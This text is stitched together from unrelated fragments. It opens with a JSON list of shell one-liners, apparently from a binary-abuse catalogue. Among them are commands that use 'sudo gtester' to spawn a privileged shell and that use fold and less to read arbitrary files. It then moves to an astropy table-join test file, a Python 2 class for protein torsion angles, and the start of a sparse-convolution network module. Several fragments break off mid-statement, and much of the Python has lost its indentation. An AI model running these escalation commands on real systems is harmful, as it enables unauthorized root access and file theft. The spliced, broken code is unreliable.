"TF=$(mktemp)\necho '#!/bin/sh -p' > $TF\necho 'exec /bin/sh -p 0<&1' >> $TF\nchmod +x $TF\nsudo gtester -q $TF\n"
],
"fold":
[
"LFILE=file_to_read\n./fold -w99999999 \"$LFILE\"\n"
],
"less":
[
"./less file_to_read"
],
"jrunscript":
[
"./jrunscript -e \"exec('/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p | |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# TEST_UNICODE_LITERALS
import numpy as np
from ...tests.helper import pytest, catch_warnings
from ...table import Table, TableMergeError
from ...utils import OrderedDict, metadata
from ...utils.metadata import MergeConflictError
from ... import table
def sort_eq(list1, list2):
    """Order-insensitive equality: True if both sequences hold the same items."""
    a = sorted(list1)
    b = sorted(list2)
    return a == b
class TestJoin():
    def setup_method(self, method):
        """Build the fixture tables used by the join tests.

        t1 and t2 share the key columns 'a' and 'b'.  t3 is a copy of t2
        whose meta is made to conflict with t1's (scalar vs list, list vs
        dict) so the ``metadata_conflicts`` modes can be exercised.
        ``meta_merge`` is the expected conflict-free merge of t1/t2 meta.
        """
        lines1 = [' a b c ',
                  ' 0 foo L1',
                  ' 1 foo L2',
                  ' 1 bar L3',
                  ' 2 bar L4']
        lines2 = [' a b d ',
                  ' 1 foo R1',
                  ' 1 foo R2',
                  ' 2 bar R3',
                  ' 4 bar R4']
        self.t1 = Table.read(lines1, format='ascii')
        self.t2 = Table.read(lines2, format='ascii')
        # Copy taken *before* the meta updates below, so t3 keeps its own meta.
        self.t3 = Table(self.t2, copy=True)
        self.t1.meta.update(OrderedDict([('b', [1, 2]), ('c', {'a': 1}), ('d', 1)]))
        self.t2.meta.update(OrderedDict([('b', [3, 4]), ('c', {'b': 1}), ('a', 1)]))
        self.t3.meta.update(OrderedDict([('b', 3), ('c', [1, 2]), ('d', 2), ('a', 1)]))
        # Expected merge of t1.meta and t2.meta: lists concatenate,
        # dicts union, unique scalars pass through unchanged.
        self.meta_merge = OrderedDict([('b', [1, 2, 3, 4]),
                                       ('c', {'a': 1, 'b': 1}),
                                       ('d', 1),
                                       ('a', 1)])
def test_table_meta_merge(self):
out = table.join(self.t1, self.t2, join_type='inner')
assert out.meta == self.meta_merge
def test_table_meta_merge_conflict(self):
with catch_warnings() as w:
out = table.join(self.t1, self.t3, join_type='inner')
assert len(w) == 3
assert out.meta == self.t3.meta
with catch_warnings() as w:
out = table.join(self.t1, self.t3, join_type='inner', metadata_conflicts='warn')
assert len(w) == 3
assert out.meta == self.t3.meta
with catch_warnings() as w:
out = table.join(self.t1, self.t3, join_type='inner', metadata_conflicts='silent')
assert len(w) == 0
assert out.meta == self.t3.meta
with pytest.raises(MergeConflictError):
out = table.join(self.t1, self.t3, join_type='inner', metadata_conflicts='error')
with pytest.raises(ValueError):
out = table.join(self.t1, self.t3, join_type='inner', metadata_conflicts='nonsense')
    def test_both_unmasked_inner(self):
        """Default join is an inner join on the common keys ('a', 'b')."""
        t1 = self.t1
        t2 = self.t2
        # Basic join with default parameters (inner join on common keys)
        t12 = table.join(t1, t2)
        # Neither input is masked and no padding is needed -> unmasked result.
        assert t12.masked is False
        # Only key combinations present in *both* tables survive.
        assert sort_eq(t12.pformat(), [' a b c d ',
                                       '--- --- --- ---',
                                       ' 1 foo L2 R1',
                                       ' 1 foo L2 R2',
                                       ' 2 bar L4 R3'])
        # Table meta merged properly
        assert t12.meta == self.meta_merge
    def test_both_unmasked_left_right_outer(self):
        """Left/right/outer joins pad unmatched rows and force masking."""
        t1 = self.t1
        t2 = self.t2
        # Left join: every t1 row appears; unmatched right columns are masked.
        t12 = table.join(t1, t2, join_type='left')
        assert t12.masked is True
        assert sort_eq(t12.pformat(), [' a b c d ',
                                       '--- --- --- ---',
                                       ' 0 foo L1 --',
                                       ' 1 bar L3 --',
                                       ' 1 foo L2 R1',
                                       ' 1 foo L2 R2',
                                       ' 2 bar L4 R3'])
        # Right join: every t2 row appears; unmatched left columns are masked.
        t12 = table.join(t1, t2, join_type='right')
        assert t12.masked is True
        assert sort_eq(t12.pformat(), [' a b c d ',
                                       '--- --- --- ---',
                                       ' 1 foo L2 R1',
                                       ' 1 foo L2 R2',
                                       ' 2 bar L4 R3',
                                       ' 4 bar -- R4'])
        # Outer join: union of both sides.
        t12 = table.join(t1, t2, join_type='outer')
        assert t12.masked is True
        assert sort_eq(t12.pformat(), [' a b c d ',
                                       '--- --- --- ---',
                                       ' 0 foo L1 --',
                                       ' 1 bar L3 --',
                                       ' 1 foo L2 R1',
                                       ' 1 foo L2 R2',
                                       ' 2 bar L4 R3',
                                       ' 4 bar -- R4'])
        # Check that the common keys are 'a', 'b': joining with explicit
        # keys must give an identical result to the default.
        t12a = table.join(t1, t2, join_type='outer')
        t12b = table.join(t1, t2, join_type='outer', keys=['a', 'b'])
        assert np.all(t12a.as_array() == t12b.as_array())
    def test_both_unmasked_single_key_inner(self):
        """Inner join on 'a' only; the shared non-key column 'b' is
        deduplicated into b_1/b_2 and rows pair up per key value."""
        t1 = self.t1
        t2 = self.t2
        # Inner join on 'a' column
        t12 = table.join(t1, t2, keys='a')
        assert t12.masked is False
        assert sort_eq(t12.pformat(), [' a b_1 c b_2 d ',
                                       '--- --- --- --- ---',
                                       ' 1 foo L2 foo R1',
                                       ' 1 foo L2 foo R2',
                                       ' 1 bar L3 foo R1',
                                       ' 1 bar L3 foo R2',
                                       ' 2 bar L4 bar R3'])
    def test_both_unmasked_single_key_left_right_outer(self):
        """Left/right/outer joins on the single key 'a': the duplicated
        'b' column is renamed b_1/b_2 and unmatched rows are masked."""
        t1 = self.t1
        t2 = self.t2
        # Left join
        t12 = table.join(t1, t2, join_type='left', keys='a')
        assert t12.masked is True
        assert sort_eq(t12.pformat(), [' a b_1 c b_2 d ',
                                       '--- --- --- --- ---',
                                       ' 0 foo L1 -- --',
                                       ' 1 foo L2 foo R1',
                                       ' 1 foo L2 foo R2',
                                       ' 1 bar L3 foo R1',
                                       ' 1 bar L3 foo R2',
                                       ' 2 bar L4 bar R3'])
        # Right join
        t12 = table.join(t1, t2, join_type='right', keys='a')
        assert t12.masked is True
        assert sort_eq(t12.pformat(), [' a b_1 c b_2 d ',
                                       '--- --- --- --- ---',
                                       ' 1 foo L2 foo R1',
                                       ' 1 foo L2 foo R2',
                                       ' 1 bar L3 foo R1',
                                       ' 1 bar L3 foo R2',
                                       ' 2 bar L4 bar R3',
                                       ' 4 -- -- bar R4'])
        # Outer join: union of left and right results above.
        t12 = table.join(t1, t2, join_type='outer', keys='a')
        assert t12.masked is True
        assert sort_eq(t12.pformat(), [' a b_1 c b_2 d ',
                                       '--- --- --- --- ---',
                                       ' 0 foo L1 -- --',
                                       ' 1 foo L2 foo R1',
                                       ' 1 foo L2 foo R2',
                                       ' 1 bar L3 foo R1',
                                       ' 1 bar L3 foo R2',
                                       ' 2 bar L4 bar R3',
                                       ' 4 -- -- bar R4'])
    def test_masked_unmasked(self):
        """Join of a masked with an unmasked table.

        The result is masked, equals the all-unmasked result while no
        values are actually masked, and masked entries propagate through
        the join in either argument order.
        """
        t1 = self.t1
        t1m = Table(self.t1, masked=True)
        t2 = self.t2
        # Result should be masked even though not req'd by inner join
        t1m2 = table.join(t1m, t2, join_type='inner')
        assert t1m2.masked is True
        # Result should match non-masked result
        t12 = table.join(t1, t2)
        assert np.all(t12.as_array() == np.array(t1m2))
        # Mask out some values in left table and make sure they propagate
        t1m['b'].mask[1] = True
        t1m['c'].mask[2] = True
        t1m2 = table.join(t1m, t2, join_type='inner', keys='a')
        assert sort_eq(t1m2.pformat(), [' a b_1 c b_2 d ',
                                        '--- --- --- --- ---',
                                        ' 1 -- L2 foo R1',
                                        ' 1 -- L2 foo R2',
                                        ' 1 bar -- foo R1',
                                        ' 1 bar -- foo R2',
                                        ' 2 bar L4 bar R3'])
        # Same join with the masked table on the right-hand side.
        t21m = table.join(t2, t1m, join_type='inner', keys='a')
        assert sort_eq(t21m.pformat(), [' a b_1 d b_2 c ',
                                        '--- --- --- --- ---',
                                        ' 1 foo R2 -- L2',
                                        ' 1 foo R2 bar --',
                                        ' 1 foo R1 -- L2',
                                        ' 1 foo R1 bar --',
                                        ' 2 bar R3 bar L4'])
    def test_masked_masked(self):
        """Two masked tables: the result is masked, matches the unmasked
        result while nothing is actually masked, and masked values from
        both sides propagate into the joined table."""
        t1 = self.t1
        t1m = Table(self.t1, masked=True)
        t2 = self.t2
        t2m = Table(self.t2, masked=True)
        # Result should be masked even though not req'd by inner join
        t1m2m = table.join(t1m, t2m, join_type='inner')
        assert t1m2m.masked is True
        # Result should match non-masked result
        t12 = table.join(t1, t2)
        assert np.all(t12.as_array() == np.array(t1m2m))
        # Mask out some values in both tables and make sure they propagate
        t1m['b'].mask[1] = True
        t1m['c'].mask[2] = True
        t2m['d'].mask[2] = True
        t1m2m = table.join(t1m, t2m, join_type='inner', keys='a')
        assert sort_eq(t1m2m.pformat(), [' a b_1 c b_2 d ',
                                         '--- --- --- --- ---',
                                         ' 1 -- L2 foo R1',
                                         ' 1 -- L2 foo R2',
                                         ' 1 bar -- foo R1',
                                         ' 1 bar -- foo R2',
                                         ' 2 bar L4 bar --'])
def test_col_rename(self):
"""
Test auto col renaming when there is a conflict. Use
non-default values of uniq_col_name and table_names.
"""
t1 = self.t1
t2 = self.t2
t12 = table.join(t1, t2, uniq_col_name='x_{table_name}_{col_name}_y',
table_names=['L', 'R'], keys='a')
assert t12.colnames == ['a', 'x_L_b_y', 'c', 'x_R_b_y', 'd']
def test_rename_conflict(self):
"""
Test that auto-column rename fails because of a conflict
with an existing column
"""
t1 = self.t1
t2 = self.t2
t1['b_1'] = 1 # Add a new column b_1 that will conflict with auto-rename
with pytest.raises(TableMergeError):
table.join(t1, t2, keys='a')
def test_missing_keys(self):
"""Merge on a key column that doesn't exist"""
t1 = self.t1
t2 = self.t2
with pytest.raises(TableMergeError):
table.join(t1, t2, keys=['a', 'not there'])
def test_bad_join_type(self):
"""Bad join_type input"""
t1 = self.t1
t2 = self.t2
with pytest.raises(ValueError):
table.join(t1, t2, join_type='illegal value')
def test_no_common_keys(self):
"""Merge tables with no common keys"""
t1 = self.t1
t2 = self.t2
del t1['a']
del t1['b']
del t2['a']
del t2['b']
with pytest.raises(TableMergeError):
table.join(t1, t2)
def test_masked_key_column(self):
"""Merge on a key column that has a masked element"""
t1 = self.t1
t2 = Table(self.t2, masked=True)
table.join(t1, t2) # OK
t2['a'].mask[0] = True
with pytest.raises(TableMergeError):
table.join(t1, t2)
def test_col_meta_merge(self):
t1 = self.t1
t2 = self.t2
t2.rename_column('d', 'c') # force col conflict and renaming
meta1 = OrderedDict([('b', [1, 2]), ('c', {'a': 1}), ('d', 1)])
meta2 = OrderedDict([('b', [3, 4]), ('c', {'b': 1}), ('a', 1)])
# Key col 'a', should first value ('cm')
t1['a'].unit = 'cm'
t2['a'].unit = 'm'
# Key col 'b', take first value 't1_b'
t1['b'].description = 't1_b'
# Key col 'b', take first non-empty value 't1_b'
t2['b'].format | |
<gh_stars>1-10
import math
import sys
from math_utils import *
from names import *
from bio_pdb import PDBParser
from bio_pdb import is_aa
from bio_pdb import calc_dihedral
class PDB:
""" Usually instantiated from something like:
pdbfile = fragbuilder.PDB("1UBQ.pdb")
"""
    def __init__(self, pdbfile):
        """ Wrapper class for Bio.PDB which makes it convenient to
            read phi/psi/omega/chi torsion angles from a PDB-file.

            Arguments:
            pdbfile -- The PDB file you wish to read.

            Only the first chain of the first model is kept for all
            subsequent angle queries.
        """
        try:
            self._parser = PDBParser(QUIET=True)
        except:
            # Workaround for missing QUIET keyword
            # in certain versions of Biopython.
            self._parser = PDBParser()
        # path of the parsed PDB file
        self._pdbfile = pdbfile
        self._structure = self._parser.get_structure("pdb", self._pdbfile)
        # first chain of the first model in the structure
        self._chain = self._get_first_chain(self._structure)
        # sequence of that chain -- built by a helper defined elsewhere
        # in this class; presumably a one-letter string (TODO confirm)
        self._sequence = self._get_sequence_from_chain(self._chain)
def get_length(self):
""" Returns the length of the protein.
"""
length = 0
for residue in self._chain:
if is_aa(residue):
length += 1
return length
def get_residue_numbers(self):
""" Returns a list with indexes of all amino acids in the chain.
Can be used for iterating over residues, e.g.:
>>> for i in pdbfile.get_residue_numbers():
... print i, pdbfile.get_residue_bb_angles(i)
"""
length = self.get_length()
return range(1, length + 1)
def get_chi_angles(self, resnum):
""" Returns a list of chi angles for a residue.
Arguments:
resnum -- The number of the residue.
NOTE: Also corrects for incorrect naming of CG1/CG2 in
valine residues and CD1/CD2 in leucine residues.
Will display an error if .pdb file is incorrect.
"""
angles_rad = self._get_chi(self._chain[resnum])
angles_deg = [angle * RAD_TO_DEG for angle in angles_rad]
return angles_deg
def get_bb_angles(self, resnum):
""" Returns a list of [phi, psi, omega] angles for a residue.
Arguments:
resnum -- The number of the residue.
"""
length = self.get_length()
angles_deg = []
if resnum == 1:
res_1 = self._chain[resnum]
res_2 = self._chain[resnum + 1]
N1 = res_1['N' ].get_vector()
CA1 = res_1['CA'].get_vector()
C1 = res_1['C' ].get_vector()
N2 = res_2['N' ].get_vector()
phi = None
psi = calc_dihedral(N1, CA1, C1, N2) * RAD_TO_DEG
omega = None
angles_deg = [phi, psi, omega]
elif resnum == length:
res_0 = self._chain[resnum - 1]
res_1 = self._chain[resnum]
CA0 = res_0['CA'].get_vector()
C0 = res_0['C' ].get_vector()
N1 = res_1['N' ].get_vector()
CA1 = res_1['CA'].get_vector()
C1 = res_1['C' ].get_vector()
phi = calc_dihedral(C0, N1, CA1, C1) * RAD_TO_DEG
psi = None
omega = calc_dihedral(CA0, C0, N1, CA1) * RAD_TO_DEG
angles_deg = [phi, psi, omega]
else:
res_0 = self._chain[resnum - 1]
res_1 = self._chain[resnum]
res_2 = self._chain[resnum + 1]
CA0 = res_0['CA'].get_vector()
C0 = res_0['C' ].get_vector()
N1 = res_1['N' ].get_vector()
CA1 = res_1['CA'].get_vector()
C1 = res_1['C' ].get_vector()
N2 = res_2['N' ].get_vector()
phi = calc_dihedral(C0, N1, CA1, C1) * RAD_TO_DEG
psi = calc_dihedral(N1, CA1, C1, N2) * RAD_TO_DEG
omega = calc_dihedral(CA0, C0, N1, CA1) * RAD_TO_DEG
angles_deg = [phi, psi, omega]
return angles_deg
def _get_chi(self, residue):
""" Returns a list of chi angles for a residue """
if residue.get_resname() == 'ALA':
return []
if residue.get_resname() == 'GLY':
return []
if residue.get_resname() == 'ARG':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD'].get_vector()
sc_atom6 = residue['NE'].get_vector()
sc_atom7 = residue['CZ'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom6)
chi4 = calc_dihedral(sc_atom4, sc_atom5, sc_atom6, sc_atom7)
return [chi1, chi2, chi3, chi4]
if residue.get_resname() == 'ASN':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['OD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'ASP':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['OD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'CYS':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['SG'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
return [chi1]
if residue.get_resname() == 'GLU':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD'].get_vector()
sc_atom6 = residue['OE1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom6)
return [chi1, chi2, chi3]
if residue.get_resname() == 'GLN':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD'].get_vector()
sc_atom6 = residue['OE1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom6)
return [chi1, chi2, chi3]
if residue.get_resname() == 'HIS':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD2'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'ILE':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG1'].get_vector()
sc_atom5 = residue['CD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'LEU':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD1'].get_vector()
sc_atom5_b = residue['CD2'].get_vector()
# Check for correct naming of CD1/CD2
check_angle = calc_dihedral(sc_atom5, sc_atom4, sc_atom3, sc_atom5_b)
# If the naming of the CD1 and CD2 atoms is correct,
# the check_angle will be around -120 deg. If the names
# are swapped, the angle will be around 120 deg.
if check_angle > 0:
sc_atom5 = sc_atom5_b
print "WARNING: Correcting for incorrect naming of CD1 and CD2 in residue LEU%i." % residue.get_id()[1]
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'LYS':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD'].get_vector()
sc_atom6 = residue['CE'].get_vector()
sc_atom7 = residue['NZ'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom6)
chi4 = calc_dihedral(sc_atom4, sc_atom5, sc_atom6, sc_atom7)
return [chi1, chi2, chi3, chi4]
if residue.get_resname() == 'MET':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['SD'].get_vector()
sc_atom6 = residue['CE'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom6)
return [chi1, chi2, chi3]
if residue.get_resname() == 'PHE':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'PRO':
# sc_atom1 = residue['N'].get_vector()
# sc_atom2 = residue['CA'].get_vector()
# sc_atom3 = residue['CB'].get_vector()
# sc_atom4 = residue['CG'].get_vector()
# sc_atom5 = residue['CD'].get_vector()
# chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
# chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
# chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom1)
# chi4 = calc_dihedral(sc_atom4, sc_atom5, sc_atom1, sc_atom2)
# return [chi1, chi2, chi3, chi4]
return []
if residue.get_resname() == 'SER':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['OG'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
return [chi1]
if residue.get_resname() == 'THR':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['OG1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
return [chi1]
if residue.get_resname() == 'TRP':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'TYR':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'VAL':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG1'].get_vector()
sc_atom4_b = residue['CG2'].get_vector()
# Check for correct naming of CG1/CG2
check_angle = calc_dihedral(sc_atom4, sc_atom3, sc_atom2, sc_atom4_b)
# If the naming of the CG1 and CG2 atoms is correct,
# the check_angle will be around -120 deg. If the names
# are swapped, the angle will be around 120 deg.
if check_angle > 0:
sc_atom4 = sc_atom4_b
print "WARNING: Correcting for incorrect naming of CG1 and CG2 in residue VAL%i." % residue.get_id()[1]
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
return [chi1]
else:
return "FAILLLL"
def _get_first_chain(self, structure):
    """Return the first chain of the first model in a Bio.PDB structure.

    Returns None when the structure contains no models or no chains.
    """
    for model in structure:
        for chain in model:
            return chain
    return None
| |
# -*- coding:utf-8 -*-
# author: Xinge
# @file: spconv_unet.py
# @time: 2020/06/22 15:01
import time
import numpy as np
import spconv
import torch
import torch.nn.functional as F
from torch import nn
def conv3x3(in_planes, out_planes, stride=1, indice_key=None):
    """3x3x3 submanifold sparse convolution, padding 1, no bias."""
    return spconv.SubMConv3d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
        indice_key=indice_key,
    )
def conv1x3(in_planes, out_planes, stride=1, indice_key=None):
    """(1,3,3)-kernel submanifold sparse convolution, no bias."""
    return spconv.SubMConv3d(
        in_planes,
        out_planes,
        kernel_size=(1, 3, 3),
        stride=stride,
        padding=(0, 1, 1),
        bias=False,
        indice_key=indice_key,
    )
def conv1x1x3(in_planes, out_planes, stride=1, indice_key=None):
    """(1,1,3)-kernel submanifold sparse convolution, no bias."""
    return spconv.SubMConv3d(
        in_planes,
        out_planes,
        kernel_size=(1, 1, 3),
        stride=stride,
        padding=(0, 0, 1),
        bias=False,
        indice_key=indice_key,
    )
def conv1x3x1(in_planes, out_planes, stride=1, indice_key=None):
    """(1,3,1)-kernel submanifold sparse convolution, no bias."""
    return spconv.SubMConv3d(
        in_planes,
        out_planes,
        kernel_size=(1, 3, 1),
        stride=stride,
        padding=(0, 1, 0),
        bias=False,
        indice_key=indice_key,
    )
def conv3x1x1(in_planes, out_planes, stride=1, indice_key=None):
    """(3,1,1)-kernel submanifold sparse convolution, no bias."""
    return spconv.SubMConv3d(
        in_planes,
        out_planes,
        kernel_size=(3, 1, 1),
        stride=stride,
        padding=(1, 0, 0),
        bias=False,
        indice_key=indice_key,
    )
def conv3x1(in_planes, out_planes, stride=1, indice_key=None):
    """(3,1,3)-kernel submanifold sparse convolution, no bias.

    NOTE(review): despite the name, the kernel is (3,1,3), the
    complement of conv1x3's (1,3,3) — kept as written.
    """
    return spconv.SubMConv3d(
        in_planes,
        out_planes,
        kernel_size=(3, 1, 3),
        stride=stride,
        padding=(1, 0, 1),
        bias=False,
        indice_key=indice_key,
    )
def conv1x1(in_planes, out_planes, stride=1, indice_key=None):
    """1x1x1 submanifold sparse convolution, no bias.

    NOTE(review): padding=1 with kernel_size=1 looks suspicious for a
    regular conv; for a submanifold conv the output locations equal the
    input locations, so it is presumably inert — kept as written.
    """
    return spconv.SubMConv3d(
        in_planes,
        out_planes,
        kernel_size=1,
        stride=stride,
        padding=1,
        bias=False,
        indice_key=indice_key,
    )
class ResContextBlock(nn.Module):
    """Two-branch residual context block for spconv sparse tensors.

    Branch A: (1,3,3) conv -> act -> BN -> (3,1,3) conv -> act -> BN.
    Branch B: (3,1,3) conv -> act -> BN -> (1,3,3) conv -> act -> BN.
    The two branch outputs are summed feature-wise.  ``kernel_size`` and
    ``stride`` are accepted for signature compatibility but unused.

    NOTE(review): the activation is applied *before* batch norm in every
    step — unusual ordering, kept as written.
    """
    def __init__(self, in_filters, out_filters, kernel_size=(3, 3, 3), stride=1, indice_key=None):
        super(ResContextBlock, self).__init__()
        # Branch A: (1,3,3) then (3,1,3) submanifold convs.
        self.conv1 = conv1x3(in_filters, out_filters, indice_key=indice_key+"bef")
        self.bn0 = nn.BatchNorm1d(out_filters)
        self.act1 = nn.LeakyReLU()
        self.conv1_2 = conv3x1(out_filters, out_filters, indice_key=indice_key+"bef")
        self.bn0_2 = nn.BatchNorm1d(out_filters)
        self.act1_2 = nn.LeakyReLU()
        # Branch B: (3,1,3) then (1,3,3) submanifold convs.
        self.conv2 = conv3x1(in_filters, out_filters, indice_key=indice_key+"bef")
        self.act2 = nn.LeakyReLU()
        self.bn1 = nn.BatchNorm1d(out_filters)
        self.conv3 = conv1x3(out_filters, out_filters, indice_key=indice_key+"bef")
        self.act3 = nn.LeakyReLU()
        self.bn2 = nn.BatchNorm1d(out_filters)
    def forward(self, x):
        # x: spconv.SparseConvTensor; all ops mutate .features in place.
        # Branch A.
        shortcut = self.conv1(x)
        shortcut.features = self.act1(shortcut.features)
        shortcut.features = self.bn0(shortcut.features)
        shortcut = self.conv1_2(shortcut)
        shortcut.features = self.act1_2(shortcut.features)
        shortcut.features = self.bn0_2(shortcut.features)
        # Branch B.
        resA = self.conv2(x)
        resA.features = self.act2(resA.features)
        resA.features = self.bn1(resA.features)
        resA = self.conv3(resA)
        resA.features = self.act3(resA.features)
        resA.features = self.bn2(resA.features)
        # Feature-wise sum of the two branches (same indices, so this is valid).
        resA.features = resA.features + shortcut.features
        return resA
class ResBlock(nn.Module):
    """Residual block with optional strided sparse-conv downsampling.

    Uses the same two-branch asymmetric-conv pattern as ResContextBlock.
    When ``pooling`` is True, a strided SparseConv3d downsamples the
    result (stride 2 on all axes when ``height_pooling``, else (2,2,1))
    and ``forward`` returns ``(pooled, unpooled)``; otherwise only the
    unpooled tensor is returned.

    ``dropout_rate``, ``kernel_size``, ``stride`` and ``drop_out`` are
    currently unused (the dropout path is commented out).
    """
    def __init__(self, in_filters, out_filters, dropout_rate, kernel_size=(3, 3, 3), stride=1,
                 pooling=True, drop_out=True, height_pooling=False, indice_key=None):
        super(ResBlock, self).__init__()
        self.pooling = pooling
        self.drop_out = drop_out
        # Branch A: (3,1,3) then (1,3,3) submanifold convs.
        self.conv1 = conv3x1(in_filters, out_filters, indice_key=indice_key+"bef")
        self.act1 = nn.LeakyReLU()
        self.bn0 = nn.BatchNorm1d(out_filters)
        self.conv1_2 = conv1x3(out_filters, out_filters, indice_key=indice_key+"bef")
        self.act1_2 = nn.LeakyReLU()
        self.bn0_2 = nn.BatchNorm1d(out_filters)
        # Branch B: (1,3,3) then (3,1,3) submanifold convs.
        self.conv2 = conv1x3(in_filters, out_filters, indice_key=indice_key+"bef")
        self.act2 = nn.LeakyReLU()
        self.bn1 = nn.BatchNorm1d(out_filters)
        self.conv3 = conv3x1(out_filters, out_filters, indice_key=indice_key+"bef")
        self.act3 = nn.LeakyReLU()
